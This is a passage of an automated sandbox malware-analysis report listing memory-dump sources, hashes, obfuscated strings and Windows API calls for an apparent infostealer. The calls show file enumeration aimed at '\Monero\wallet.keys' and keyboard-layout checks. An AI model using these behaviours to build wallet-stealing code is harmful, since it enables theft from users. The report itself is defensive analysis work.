                                  • FindClose.KERNEL32(000000FF), ref: 00BAE3F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: a581513d8967b66c307e55b2aa2147cb18921fb38e1381bca9cff9c6cd9cfb33
                                  • Instruction ID: a691fecb28ff295e1aa7ca422c23cb682843eff3bcf5cca84e3603ca93492fa3
                                  • Opcode Fuzzy Hash: a581513d8967b66c307e55b2aa2147cb18921fb38e1381bca9cff9c6cd9cfb33
                                  • Instruction Fuzzy Hash: 26F18E71C14118ABDB25FB64CCA5EFE73B8AF54300F8045D9A45A72491EF706F8ACE61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: !2}w$%[{$(G_o$:n]o$<8~}$Qx?$h;$W]$`_$]{
                                  • API String ID: 0-775019265
                                  • Opcode ID: 567350fbd2cf58c6a7d5c652231e11edbe820cc580c210134f14dbb3a255abf9
                                  • Instruction ID: 066622ab1bdb121a185d9cba2b54cc020b33ba70185e7152223b9fdd4b04c9a2
                                  • Opcode Fuzzy Hash: 567350fbd2cf58c6a7d5c652231e11edbe820cc580c210134f14dbb3a255abf9
                                  • Instruction Fuzzy Hash: 3DB22CF3A0C2049FE308AE2DEC8567AB7E6EBD4720F16863DE6C5C3744E93558058657
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC14B0,00BC0C2A), ref: 00BADAEB
                                  • StrCmpCA.SHLWAPI(?,00BC14B4), ref: 00BADB33
                                  • StrCmpCA.SHLWAPI(?,00BC14B8), ref: 00BADB49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BADDCC
                                  • FindClose.KERNEL32(000000FF), ref: 00BADDDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: c3fefd8dbbce9816af55a2d45fb5196265aef7a471f0311b0463603df1f5af91
                                  • Instruction ID: 6cb213d6ecd5bfd1f7dcf642680b0718f80810a536e9d34fe0f3d89aa1cda5b5
                                  • Opcode Fuzzy Hash: c3fefd8dbbce9816af55a2d45fb5196265aef7a471f0311b0463603df1f5af91
                                  • Instruction Fuzzy Hash: E2914872D04104ABCB14FB74DC96DFD77BCAB95300F4085D8F90A96551EE74AB09CBA2
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00BC05AF), ref: 00BB7BE1
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BB7BF9
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BB7C0D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BB7C62
                                  • LocalFree.KERNEL32(00000000), ref: 00BB7D22
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: 0720a78fcc45f0ebe7eae08d18d83a249ea87ff3b2220a685e45602577495c36
                                  • Instruction ID: 0eade3cd21de7c107f3782c29c88261d4100c4acc1a401e7e928cbf5c9192661
                                  • Opcode Fuzzy Hash: 0720a78fcc45f0ebe7eae08d18d83a249ea87ff3b2220a685e45602577495c36
                                  • Instruction Fuzzy Hash: C8412C71940218ABDB24EB94DC99BFDB7B8FB44700F6041D9E009A6291DBB46F85CFA1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: :_=z$Po:$Z5Zk$]D?$k52$pX/~$0/
                                  • API String ID: 0-1813028665
                                  • Opcode ID: b1cc36254268c4a80521ac07d6d731d57f924bfacac4a8de9b55b17c4f34affe
                                  • Instruction ID: c0b1c7629a14628355046049c376fac7af5dc5d85e13eca40873aa24dd6cc578
                                  • Opcode Fuzzy Hash: b1cc36254268c4a80521ac07d6d731d57f924bfacac4a8de9b55b17c4f34affe
                                  • Instruction Fuzzy Hash: 91B2C8F360C200AFE304AE2DDC8577ABBE9EF94720F16893DE6C4D7744E63598058696
                                  APIs
                                    • Part of subcall function 00BBA740: lstrcpy.KERNEL32(00BC0E17,00000000), ref: 00BBA788
                                    • Part of subcall function 00BBA920: lstrcpy.KERNEL32(00000000,?), ref: 00BBA972
                                    • Part of subcall function 00BBA920: lstrcat.KERNEL32(00000000), ref: 00BBA982
                                    • Part of subcall function 00BBA9B0: lstrlen.KERNEL32(?,01409EC0,?,\Monero\wallet.keys,00BC0E17), ref: 00BBA9C5
                                    • Part of subcall function 00BBA9B0: lstrcpy.KERNEL32(00000000), ref: 00BBAA04
                                    • Part of subcall function 00BBA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAA12
                                    • Part of subcall function 00BBA8A0: lstrcpy.KERNEL32(?,00BC0E17), ref: 00BBA905
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BC0D73), ref: 00BAE4A2
                                  • StrCmpCA.SHLWAPI(?,00BC14F8), ref: 00BAE4F2
                                  • StrCmpCA.SHLWAPI(?,00BC14FC), ref: 00BAE508
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAEBDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: 600e5da3ef969ce3338e23e5677e888313b6cd682d985fb37400c14b2ddcbe40
                                  • Instruction ID: b3240e183760d2f3e5555aa19ddf32122bec8ac5634c0ad6da6a3760b5b40a36
                                  • Opcode Fuzzy Hash: 600e5da3ef969ce3338e23e5677e888313b6cd682d985fb37400c14b2ddcbe40
                                  • Instruction Fuzzy Hash: 8D124271D10114ABDB24FB60DCA6EFD73B8AF54300F4045E9B50AA6191EFB06F49CBA2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 'djB$4Ivw$?ow$V|l$v+^$n1y
                                  • API String ID: 0-643026759
                                  • Opcode ID: 9f35e1fcff98538de500abb74c9a27008bf3fb033208fbb656900551a01859a0
                                  • Instruction ID: 437cc062085851d770ba269fe02ed6868fea34aea765101712d9be9587d3b005
                                  • Opcode Fuzzy Hash: 9f35e1fcff98538de500abb74c9a27008bf3fb033208fbb656900551a01859a0
                                  • Instruction Fuzzy Hash: F2B206F360C204AFE304AE29EC8567AB7E5EF94720F1A893DE6C4C7744EA3558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 5{9$0R3v$:~G$F0sw$b3$&e
                                  • API String ID: 0-1338521003
                                  • Opcode ID: 0dfb7d4516bb67fb19424ed56be6b6156d130f83d596caff2d802e9358f4f0b7
                                  • Instruction ID: 1e2ab30589f6bb7fa9e042d907b47f3963900f56e8a53099d4dbb12c05d5a62c
                                  • Opcode Fuzzy Hash: 0dfb7d4516bb67fb19424ed56be6b6156d130f83d596caff2d802e9358f4f0b7
                                  • Instruction Fuzzy Hash: D4B203F3A0C214AFE3046E2DEC8577ABBE9EB94320F16493DEAC4D3744E63558058697
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 0:$Q,W$h]L$k{?$||?
                                  • API String ID: 0-2339966404
                                  • Opcode ID: b7ef95cb3f442047c07c33f29fe8b23d665ab210f6de7b1a848d5e035639bf6b
                                  • Instruction ID: c11a760d0ae046e045b9d958254f0407a33fa577f7ea93135567eadf7624dae1
                                  • Opcode Fuzzy Hash: b7ef95cb3f442047c07c33f29fe8b23d665ab210f6de7b1a848d5e035639bf6b
                                  • Instruction Fuzzy Hash: 55B229F3A0C2049FE3046E2DEC8567AFBE9EFD4720F1A853DEAC483744E67558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -%W$7(<^$[D?g$mh=$w$}v
                                  • API String ID: 0-3975050654
                                  • Opcode ID: 0350f7b45accace059152ecd9287391823a2f1fef46653178c6b3bb89e6af65d
                                  • Instruction ID: eb878a35c1ebc9554bd159f54fb13f50b28caf730315d54347b05e1720ab3f67
                                  • Opcode Fuzzy Hash: 0350f7b45accace059152ecd9287391823a2f1fef46653178c6b3bb89e6af65d
                                  • Instruction Fuzzy Hash: 04B20AF360C2009FE7046E2DEC8567AFBE9EF94720F16493EEAC5C3744EA3558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193771977.00000000010A2000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193909134.0000000001240000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193927120.0000000001241000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: B9w$Gv]$Mlg$N.{g$H}m
                                  • API String ID: 0-1474871554
                                  • Opcode ID: b45ba1a5c489b783d4b4f659b076ff25e1f3ec4bf07799492160676bb643e67e
                                  • Instruction ID: 3dbf463ef0a08f439ea375f7056d6dc8908deee39b27280163a6ba4e2ff7b6a2
                                  • Opcode Fuzzy Hash: b45ba1a5c489b783d4b4f659b076ff25e1f3ec4bf07799492160676bb643e67e
                                  • Instruction Fuzzy Hash: BCB23BF3A0C204AFE304AE2DEC85A7AFBE9EF94720F16493DE6C5C3744E53558058696
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2193453262.0000000000DFE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                   • Associated: 00000000.00000002.2193219558.0000000000BA0000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C51000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000C82000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193266916.0000000000DEA000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000000F8F000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001069000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.000000000108B000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.2193453262.00000000010A1000.00000040.00000001.01000000.00000003.sdmp
